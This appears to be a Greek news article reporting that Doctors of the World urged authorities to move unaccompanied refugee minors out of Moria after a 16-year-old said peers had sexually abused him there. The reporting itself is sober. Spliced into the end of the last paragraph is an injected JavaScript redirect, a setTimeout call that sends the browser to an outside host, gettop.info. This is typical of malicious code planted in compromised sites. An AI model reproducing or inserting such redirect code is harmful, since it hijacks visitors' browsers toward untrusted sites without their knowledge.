Γιατροί του Κόσμου: Να μεταφερθούν τα ασυνόδευτα προσφυγόπουλα εκτός Μόριας

0
6

 

Μετά το τραγικό περιστατικό σεξουαλικής κακοποίησης 16χρονου ασυνόδευτου προφυγόπουλου στη Μόρια, οι «Γιατροί του Κόσμου», που συνέδραμαν στην αντιμετώπισή του, με ανακοίνωσή τους απευθύνουν έκκληση ώστε να απομακρυνθούν από το hot spot της Μόριας όλα τ ασυνόδευτα προσφυγόπουλα.

Κλιμάκιο της οργάνωσης προσήλθε στον χώρο του Κέντρου Υποδοχής και Ταυτοποίησης, λίγο μετά τα μεσάνυχτα του περασμένου Σαββάτου, έπειτα από σχετικό αίτημα της Υπηρεσίας Υποδοχής και Ταυτοποίησης, περιγράφεται στην ανακοίνωση.

Πραγματοποιήθηκε ατομική συνεδρία με ψυχολόγο των «Γιατρών του Κόσμου», κατά τη διάρκεια της οποίας ο ανήλικος δήλωσε ότι κακοποιήθηκε σεξουαλικά από συνομήλικούς του, εντός του χώρου όπου φιλοξενούνται οι ασυνόδευτοι στη Μόρια. Δεδομένης της σοβαρότητας του περιστατικού, ενημερώθηκε άμεσα ο διοικητής του κέντρου, ώστε να προβεί στις δέουσες και προβλεπόμενες διαδικασίες από το νόμο και να αναζητηθεί άμεσα εναλλακτικός χώρος φιλοξενίας του ανήλικου σε μεταβατική δομή φιλοξενίας εκτός του κέντρου.

Οι «Γιατροί του Κόσμου» εκφράζουν τη λύπη τους για το περιστατικό, το οποίο «επαναφέρει επιτακτικά το ζήτημα της παρατεταμένης κράτησης των ασυνόδευτων ανηλίκων που κρατούνται στο Κέντρο Υποδοχής στη Μόρια και των σοβαρών επιπτώσεων που επιφέρει η κράτηση στην ψυχική τους υγεία».

Η ΜΚΟ απευθύνει έκκληση προς τις αρμόδιες αρχές να λάβουν άμεσα πρωτοβουλίες για τη μεταφορά των ανηλίκων που παραμένουν στη Μόρια, σε κατάλληλες δομές φιλοξενίας και για το σχεδιασμό και την υλοποίηση κατάλληλων πολιτικών και μέτρων προστασίας, που να διασφαλίζουν το βέλτιστο συμφέρον των παιδιών, όπως η αναδοχή που εφαρμόζεται ευρέως στην Ευρώπη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here